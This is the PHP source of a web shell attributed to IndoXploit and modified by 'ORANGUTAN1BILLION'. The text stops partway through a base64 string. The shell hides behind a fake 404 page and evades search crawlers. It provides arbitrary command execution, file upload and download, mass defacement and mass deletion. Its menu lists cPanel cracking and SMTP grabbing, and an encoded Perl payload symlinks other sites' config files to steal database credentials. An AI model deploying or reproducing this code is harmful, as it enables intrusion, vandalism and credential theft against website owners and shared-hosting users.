SHELL BY INDOXPLOIT - MODIFIED BY ORANGUTAN1BILLION

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "65635cd7a7b4c128baf71a02389de8c3"; // silahkan crack sendiri hehe
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21.         header('HTTP/1.0 404 Not Found');
22.         exit;
23.     }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>404 Not Found</title>
31. <style type="text/css">
32.  
33. html {
34.         background: #ffffff;
35.         text-align: center;
36.        
37. }
38.  
39.   input[type="password"] {
40.     border: none;
41.     background: transparent;
42.     /*background-color: blue;*/
43.   }
44.   #ghostlogin { position:center; }
45. pre {
46.     font-family: "Times New Roman", Times, serif;
47. }
48. pre {
49.     font-size: 18px;
50. }
51. pre {
52.     font-size: x-large;
53. }
54. pre {
55.     font-weight: bold;
56. }
57. pre {
58.     font-size: xx-large;
59.     text-align: left;
60. }
61. header {
62.     text-align: left;
63. }
64. </style>
65.  
66. </style>
67. </head>
68. <center>
69. <header>
70.   <pre>Not Found</pre>
71.   <p>The requested URL  was not found on this server.</p>
72.   <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
73.   </p>
74. </header>
75. <form method="post">
76.   <p>&nbsp;</p>
77.   <p>&nbsp;</p>
78.   <p>&nbsp;</p>
79.   <p>&nbsp;</p>
80.   <p>&nbsp;</p>
81.   <p>&nbsp;</p>
82.   <p>
83.     <input id="ghostlogin" type="password" name="pass">
84.   </p>
85. </form>
86. <?php
87. exit;
88. }
89. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
90.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
91.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
92.     else
93.         login_shell();
94. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
95.     @ob_clean();
96.     $file = $_GET['file'];
97.     header('Content-Description: File Transfer');
98.     header('Content-Type: application/octet-stream');
99.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
100.     header('Expires: 0');
101.     header('Cache-Control: must-revalidate');
102.     header('Pragma: public');
103.     header('Content-Length: ' . filesize($file));
104.     readfile($file);
105.     exit;
106. }
107. ?>
108. <html>
109. <link rel="shortcut icon" href="http://i.imgur.com/96xjNYA.png" />
110. <head>
111. <title>- ORANGUTAN1BILLION -</title>
112. <meta name='author' content='ORANGUTAN1BILLION'>
113. <meta charset="UTF-8">
114. <style type='text/css'>
115. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
116. html {
117. background: #ff0084;
118. background: -moz-linear-gradient(top, #ff0084 0%, #0099b7 100%);
119. background: -webkit-linear-gradient(top, #ff0084 0%,#0099b7 100%);
120. background: linear-gradient(to bottom, #ff0084 0%,#0099b7 100%);
121. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ff0084', endColorstr='#0099b7',GradientType=0 );
122. font-family: Tahoma, Geneva, sans-serif;
123. font-size: 15px;
124. }
125.  
126. li {
127.     display: inline;
128.     margin: 5px;
129.     padding: 5px;
130. }
131.  
132. table, th, td {
133.     border-collapse:collapse;
134.     font-family: Tahoma, Geneva, sans-serif;
135.     background: transparent;
136.     font-family: 'Ubuntu';
137.     font-size: 13px;
138. }
139.  
140. .table_home, .th_home, .td_home {
141.     border: 1px solid #ffffff;
142. }
143.  
144. th {
145.     padding: 5px;
146. }
147.  
148. a {
149.     color: #ffffff;
150.     text-decoration: none;
151. }
152.  
153. a:hover {
154.     color: grey;
155.     text-decoration: none;
156. }
157.  
158. b {
159.     color: white;
160. }
161.  
162. input[type=text], input[type=password],input[type=submit] {
163.     background: transparent;
164.     color: #ffffff;
165.     border: 1px solid #ffffff;
166.     margin: 5px auto;
167.     padding-left: 5px;
168.     font-family: 'Ubuntu';
169.     font-size: 13px;
170. }
171.  
172. textarea {
173.     border: 1px solid #ffffff;
174.     width: 100%;
175.     height: 400px;
176.     padding-left: 5px;
177.     margin: 10px auto;
178.     resize: none;
179.     background: transparent;
180.     color: #ffffff;
181.     font-family: 'Ubuntu';
182.     font-size: 13px;
183. }
184.  
185. select {
186.     width: 152px;
187.     background: #ffffff;
188.     color: black;
189.     border: 1px solid #ffffff;
190.     margin: 5px auto;
191.     padding-left: 5px;
192.     font-family: 'Ubuntu';
193.     font-size: 13px;
194. }
195.  
196. option:hover {
197.     background: white;
198.     color: #ffffff;
199. }
200.  
201.  
202. body, a:hover {cursor: url(http://cur.cursors-4u.net/others/oth-7/oth708.cur), progress !important;}
203.  
204.  
205. </style>
206. </head>
207. <?php
208. ###############################################################################
209. // Greets: All Member IndoXploit.
210. ###############################################################################
211. function w($dir,$perm) {
212.     if(!is_writable($dir)) {
213.         return "<font color=white>".$perm."</font>";
214.     } else {
215.         return "<font color=white>".$perm."</font>";
216.     }
217. }
218. function r($dir,$perm) {
219.     if(!is_readable($dir)) {
220.         return "<font color=white>".$perm."</font>";
221.     } else {
222.         return "<font color=white>".$perm."</font>";
223.     }
224. }
225. function exe($cmd) {
226.     if(function_exists('system')) {        
227.         @ob_start();       
228.         @system($cmd);     
229.         $buff = @ob_get_contents();        
230.         @ob_end_clean();       
231.         return $buff;  
232.     } elseif(function_exists('exec')) {        
233.         @exec($cmd,$results);      
234.         $buff = "";        
235.         foreach($results as $result) {         
236.             $buff .= $result;      
237.         } return $buff;    
238.     } elseif(function_exists('passthru')) {        
239.         @ob_start();       
240.         @passthru($cmd);       
241.         $buff = @ob_get_contents();        
242.         @ob_end_clean();       
243.         return $buff;  
244.     } elseif(function_exists('shell_exec')) {      
245.         $buff = @shell_exec($cmd);     
246.         return $buff;  
247.     }
248. }
249. function perms($file){
250.     $perms = fileperms($file);
251.     if (($perms & 0xC000) == 0xC000) {
252.     // Socket
253.     $info = 's';
254.     } elseif (($perms & 0xA000) == 0xA000) {
255.     // Symbolic Link
256.     $info = 'l';
257.     } elseif (($perms & 0x8000) == 0x8000) {
258.     // Regular
259.     $info = '-';
260.     } elseif (($perms & 0x6000) == 0x6000) {
261.     // Block special
262.     $info = 'b';
263.     } elseif (($perms & 0x4000) == 0x4000) {
264.     // Directory
265.     $info = 'd';
266.     } elseif (($perms & 0x2000) == 0x2000) {
267.     // Character special
268.     $info = 'c';
269.     } elseif (($perms & 0x1000) == 0x1000) {
270.     // FIFO pipe
271.     $info = 'p';
272.     } else {
273.     // Unknown
274.     $info = 'u';
275.     }
276.         // Owner
277.     $info .= (($perms & 0x0100) ? 'r' : '-');
278.     $info .= (($perms & 0x0080) ? 'w' : '-');
279.     $info .= (($perms & 0x0040) ?
280.     (($perms & 0x0800) ? 's' : 'x' ) :
281.     (($perms & 0x0800) ? 'S' : '-'));
282.     // Group
283.     $info .= (($perms & 0x0020) ? 'r' : '-');
284.     $info .= (($perms & 0x0010) ? 'w' : '-');
285.     $info .= (($perms & 0x0008) ?
286.     (($perms & 0x0400) ? 's' : 'x' ) :
287.     (($perms & 0x0400) ? 'S' : '-'));
288.     // World
289.     $info .= (($perms & 0x0004) ? 'r' : '-');
290.     $info .= (($perms & 0x0002) ? 'w' : '-');
291.     $info .= (($perms & 0x0001) ?
292.     (($perms & 0x0200) ? 't' : 'x' ) :
293.     (($perms & 0x0200) ? 'T' : '-'));
294.     return $info;
295. }
296. function hdd($s) {
297.     if($s >= 1073741824)
298.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
299.     elseif($s >= 1048576)
300.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
301.     elseif($s >= 1024)
302.     return sprintf('%1.2f',$s / 1024 ) .' KB';
303.     else
304.     return $s .' B';
305. }
306. function ambilKata($param, $kata1, $kata2){
307.     if(strpos($param, $kata1) === FALSE) return FALSE;
308.     if(strpos($param, $kata2) === FALSE) return FALSE;
309.     $start = strpos($param, $kata1) + strlen($kata1);
310.     $end = strpos($param, $kata2, $start);
311.     $return = substr($param, $start, $end - $start);
312.     return $return;
313. }
314. function getsource($url) {
315.     $curl = curl_init($url);
316.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
317.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
318.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
319.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
320.     $content = curl_exec($curl);
321.             curl_close($curl);
322.     return $content;
323. }
324. function bing($dork) {
325.     $npage = 1;
326.     $npages = 30000;
327.     $allLinks = array();
328.     $lll = array();
329.     while($npage <= $npages) {
330.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
331.         if($x) {
332.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
333.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
334.             $npage = $npage + 10;
335.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
336.         } else break;
337.     }
338.     $URLs = array();
339.     foreach($allLinks as $url){
340.         $exp = explode("/", $url);
341.         $URLs[] = $exp[2];
342.     }
343.     $array = array_filter($URLs);
344.     $array = array_unique($array);
345.     $sss = count(array_unique($array));
346.     foreach($array as $domain) {
347.         echo $domain."\n";
348.     }
349. }
350. function reverse($url) {
351.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
352.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
353.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
354.           curl_setopt($ch, CURLOPT_HEADER, 0);
355.           curl_setopt($ch, CURLOPT_POST, 1);
356.     $resp = curl_exec($ch);
357.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
358.     $array = explode(",,", $resp);
359.     unset($array[0]);
360.     foreach($array as $lnk) {
361.         $lnk = "http://$lnk";
362.         $lnk = str_replace(",", "", $lnk);
363.         echo $lnk."\n";
364.         ob_flush();
365.         flush();
366.     }
367.         curl_close($ch);
368. }
369. if(get_magic_quotes_gpc()) {
370.     function idx_ss($array) {
371.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
372.     }
373.     $_POST = idx_ss($_POST);
374.     $_COOKIE = idx_ss($_COOKIE);
375. }
376.  
377. if(isset($_GET['dir'])) {
378.     $dir = $_GET['dir'];
379.     chdir($dir);
380. } else {
381.     $dir = getcwd();
382. }
383. $kernel = php_uname();
384. $ip = gethostbyname($_SERVER['HTTP_HOST']);
385. $dir = str_replace("\\","/",$dir);
386. $scdir = explode("/", $dir);
387. $freespace = hdd(disk_free_space("/"));
388. $total = hdd(disk_total_space("/"));
389. $used = $total - $freespace;
390. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=white>ON</font>" : "<font color=white>OFF</font>";
391. $ds = @ini_get("disable_functions");
392. $mysql = (function_exists('mysql_connect')) ? "<font color=white>ON</font>" : "<font color=white>OFF</font>";
393. $curl = (function_exists('curl_version')) ? "<font color=white>ON</font>" : "<font color=white>OFF</font>";
394. $wget = (exe('wget --help')) ? "<font color=white>ON</font>" : "<font color=white>OFF</font>";
395. $perl = (exe('perl --help')) ? "<font color=white>ON</font>" : "<font color=white>OFF</font>";
396. $python = (exe('python --help')) ? "<font color=white>ON</font>" : "<font color=white>OFF</font>";
397. $show_ds = (!empty($ds)) ? "<font color=white>$ds</font>" : "<font color=white>NONE</font>";
398. if(!function_exists('posix_getegid')) {
399.     $user = @get_current_user();
400.     $uid = @getmyuid();
401.     $gid = @getmygid();
402.     $group = "?";
403. } else {
404.     $uid = @posix_getpwuid(posix_geteuid());
405.     $gid = @posix_getgrgid(posix_getegid());
406.     $user = $uid['name'];
407.     $uid = $uid['uid'];
408.     $group = $gid['name'];
409.     $gid = $gid['gid'];
410. }
411. echo "<font color=white><b>- SYSTEM:</b></font> <font color=white>".$kernel."</font>
412.         <align=right> --- {<a style='color: white;' href='?logout=true'> Logout Shell </a>}<br>";
413. echo "<font color=white><b>- USER:</b></font> <font color=white>".$user."</font> <font color=white>(".$uid.")</font> <font color=white>Group:</font> <font color=white>".$group."</font> <font color=white>(".$gid.")</font><br>";
414. echo "<font color=white><b>- SERVER IP:</b></font> <font color=white>".$ip."</font> | <font color=white>Your IP:</font> <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
415. echo "<font color=white><b>- HDD:</b></font> <font color=white>$used</font> / <font color=white>$total</font> <font color=white>( Free: <font color=white>$freespace</font> )</font><br>";
416. echo "<font color=white><b>- SAFE MODE:</b></font> $sm<br>";
417. echo "<font color=white><b>- DISABLE FUNCTIONS</font>:</b> $show_ds<br>";
418. echo "<font color=white><b>- MYSQL:</b></font> $mysql | <font color=white>Perl:</font> $perl | <font color=white>Python:</font> $python | <font color=white>- WGET:</font> $wget | <font color=white>CURL:</font> $curl <br>";
419. echo "<font color=white><b>- CURRENT DIR:</b></font> ";
420. foreach($scdir as $c_dir => $cdir) {   
421.     echo "<a href='?dir=";
422.     for($i = 0; $i <= $c_dir; $i++) {
423.         echo $scdir[$i];
424.         if($i != $c_dir) {
425.         echo "/";
426.         }
427.     }
428.     echo "'>$cdir</a> / ";
429.    
430. }
431.  
432. echo "&nbsp;&nbsp;<font color=white>[ ".w($dir, perms($dir))." ]</font>";
433.  
434. echo "<hr>";
435. echo "<center>";
436. echo "<li>{ <a href='?'>Home</a> }</li>";
437. echo "<li>{ <a href='?dir=$dir&do=upload'>Upload</a> }</li>";
438. echo "<li>{ <a href='?dir=$dir&do=cmd'>Command</a> }</li>";
439. echo "<li>{ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> }</li>";
440. echo "<li>{ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> }</li>";
441. echo "<li>{ <a href='?dir=$dir&do=config'>Config</a> }</li>";
442. echo "<li>{ <a href='?dir=$dir&do=jumping'>Jumping</a> }</li>";
443. echo "<li>{ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> }</li>";
444. echo "<li>{ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> }</li>";
445. echo "<li>{ <a href='?dir=$dir&do=zoneh'>Zone-H</a> }</li>";
446. echo "<li>{ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> }</li>";
447. echo "<li>{ <a href='?dir=$dir&do=network'>Network</a> }</li>";
448. echo "<br>";
449. echo "<br>";
450. echo "<li>{ <a href='?dir=$dir&do=adminer'>Adminer</a> }</li>";
451. echo "<li>{ <a href='?dir=$dir&do=fake_root'>Fake Root</a> }</li>";
452. echo "<li>{ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> }</li>";
453. echo "<li>{ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> }</li>";
454. echo "<li>{ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> }</li>";
455. echo "<li>{ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> }</li>";
456. echo "<li>{ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> }</li>";
457. echo "<li>{ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> }</li>";
458. echo "<br>";
459. echo "</center>";
460. echo "<hr>";
461. if($_GET['logout'] == true) {
462.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
463.     echo "<script>window.location='?';</script>";
464. } elseif($_GET['do'] == 'upload') {
465.     echo "<center>";
466.     if($_POST['upload']) {
467.         if($_POST['tipe_upload'] == 'biasa') {
468.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
469.                 $act = "<font color=white>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
470.             } else {
471.                 $act = "<font color=white>Failed to upload file</font>";
472.             }
473.         } else {
474.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
475.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
476.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
477.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
478.                     $act = "<font color=white>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
479.                 } else {
480.                     $act = "<font color=white>Failed to upload file</font>";
481.                 }
482.             } else {
483.                 $act = "<font color=white>Failed to upload file</font>";
484.             }
485.         }
486.     }
487.     echo "<br>";
488.     echo "<b><font color=white>UPLOAD</b></font>";
489.     echo "<br>";
490.     echo "<br>";
491.     echo "
492.     <form method='post' enctype='multipart/form-data'>
493.     <input type='radio' name='tipe_upload' value='biasa' checked><font color=white>General</font> [ ".w($dir,"Writeable")." ]
494.     <input type='radio' name='tipe_upload' value='home_root'><font color=white>home_root</font> [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br><br>
495.     <input type='file' name='ix_file'>
496.     <input type='submit' value='UPLOAD' name='upload'>
497.     </form>";
498.     echo $act;
499.     echo "</center>";
500. } elseif($_GET['do'] == 'cmd') {
501.     echo "<br>";
502.     echo "<center><b><font color=white>COMMAND</b></center></font>";
503.     echo "<br>";
504.     echo "<center><form method='post'>
505.     <font style='text-decoration: bold;' color=white>".$user."@".$ip.": ~ $ </font>
506.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
507.     </center></form>";
508.     if($_POST['do_cmd']) {
509.         echo "<pre>".exe($_POST['cmd'])."</pre>";
510.     }
511. } elseif($_GET['do'] == 'mass_deface') {
512.     function sabun_massal($dir,$namafile,$isi_script) {
513.         if(is_writable($dir)) {
514.             $dira = scandir($dir);
515.             foreach($dira as $dirb) {
516.                 $dirc = "$dir/$dirb";
517.                 $lokasi = $dirc.'/'.$namafile;
518.                 if($dirb === '.') {
519.                     file_put_contents($lokasi, $isi_script);
520.                 } elseif($dirb === '..') {
521.                     file_put_contents($lokasi, $isi_script);
522.                 } else {
523.                     if(is_dir($dirc)) {
524.                         if(is_writable($dirc)) {
525.                             echo "[<font color=white>DONE</font>] $lokasi<br>";
526.                             file_put_contents($lokasi, $isi_script);
527.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
528.                         }
529.                     }
530.                 }
531.             }
532.         }
533.     }
534.     function sabun_biasa($dir,$namafile,$isi_script) {
535.         if(is_writable($dir)) {
536.             $dira = scandir($dir);
537.             foreach($dira as $dirb) {
538.                 $dirc = "$dir/$dirb";
539.                 $lokasi = $dirc.'/'.$namafile;
540.                 if($dirb === '.') {
541.                     file_put_contents($lokasi, $isi_script);
542.                 } elseif($dirb === '..') {
543.                     file_put_contents($lokasi, $isi_script);
544.                 } else {
545.                     if(is_dir($dirc)) {
546.                         if(is_writable($dirc)) {
547.                             echo "[<font color=white>DONE</font>] $dirb/$namafile<br>";
548.                             file_put_contents($lokasi, $isi_script);
549.                         }
550.                     }
551.                 }
552.             }
553.         }
554.     }
555.     if($_POST['start']) {
556.         if($_POST['tipe_sabun'] == 'mahal') {
557.             echo "<div style='margin: 5px auto; padding: 5px'>";
558.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
559.             echo "</div>";
560.         } elseif($_POST['tipe_sabun'] == 'murah') {
561.             echo "<div style='margin: 5px auto; padding: 5px'>";
562.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
563.             echo "</div>";
564.         }
565.     } else {
566.     echo "<center>";
567.     echo "<br>";
568.     echo "<b><font color=white>MASS DEFACE</b></font>";
569.     echo "<br>";
570.     echo "<br>";
571.     echo "<form method='post'>
572.     <font style='text-decoration: bold;'><font color=white>Type:</font><br><br>
573.     <input type='radio' name='tipe_sabun' value='murah' checked><font color=white>General<input type='radio' name='tipe_sabun' value='mahal'>Bulk<br><br>
574.     <font style='text-decoration: bold;'><font color=white>Folder:</font><br>
575.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
576.     <font style='text-decoration: bold;'><font color=white>Filename:</font><br>
577.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
578.     <font style='text-decoration: bold;'><font color=white>Index File:</font><br>
579.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by ORANGUTAN1BILLION</textarea><br>
580.     <input type='submit' name='start' value='SMASH!' style='width: 450px;'>
581.     </form></center>";
582.     }
583. } elseif($_GET['do'] == 'mass_delete') {
584.     function hapus_massal($dir,$namafile) {
585.         if(is_writable($dir)) {
586.             $dira = scandir($dir);
587.             foreach($dira as $dirb) {
588.                 $dirc = "$dir/$dirb";
589.                 $lokasi = $dirc.'/'.$namafile;
590.                 if($dirb === '.') {
591.                     if(file_exists("$dir/$namafile")) {
592.                         unlink("$dir/$namafile");
593.                     }
594.                 } elseif($dirb === '..') {
595.                     if(file_exists("".dirname($dir)."/$namafile")) {
596.                         unlink("".dirname($dir)."/$namafile");
597.                     }
598.                 } else {
599.                     if(is_dir($dirc)) {
600.                         if(is_writable($dirc)) {
601.                             if(file_exists($lokasi)) {
602.                                 echo "[<font color=white>DELETED</font>] $lokasi<br>";
603.                                 unlink($lokasi);
604.                                 $idx = hapus_massal($dirc,$namafile);
605.                             }
606.                         }
607.                     }
608.                 }
609.             }
610.         }
611.     }
612.     if($_POST['start']) {
613.         echo "<div style='margin: 5px auto; padding: 5px'>";
614.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
615.         echo "</div>";
616.     } else {
617.     echo "<center>";
618.     echo "<br>";
619.     echo "<b><font color=white>MASS DELETE</b></font>";
620.     echo "<br>";
621.     echo "<br>";
622.     echo "<form method='post'>
623.     <font style='text-decoration: bold;'><font color=white>Folder:</font><br>
624.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
625.     <font style='text-decoration: bold;'><font color=white>Filename:</font><br>
626.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
627.     <input type='submit' name='start' value='DELETE' style='width: 450px;'>
628.     </form></center>";
629.     }
630. } elseif($_GET['do'] == 'config') {
631.         echo "<center>";
632.     echo "<br>";
633.     echo "<b><font color=white>CONFIG</b></font>";
634.     echo "<br>";
635.     echo "<br>";
636.     $idx = mkdir("idx_config", 0777);
637.     $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
638.     $htc = fopen("idx_config/.htaccess","w");
639.     fwrite($htc, $isi_htc);
640.     fclose($htc);
641.     if(preg_match("/vhosts|vhost/", $dir)) {
642.         $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
643.         $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpd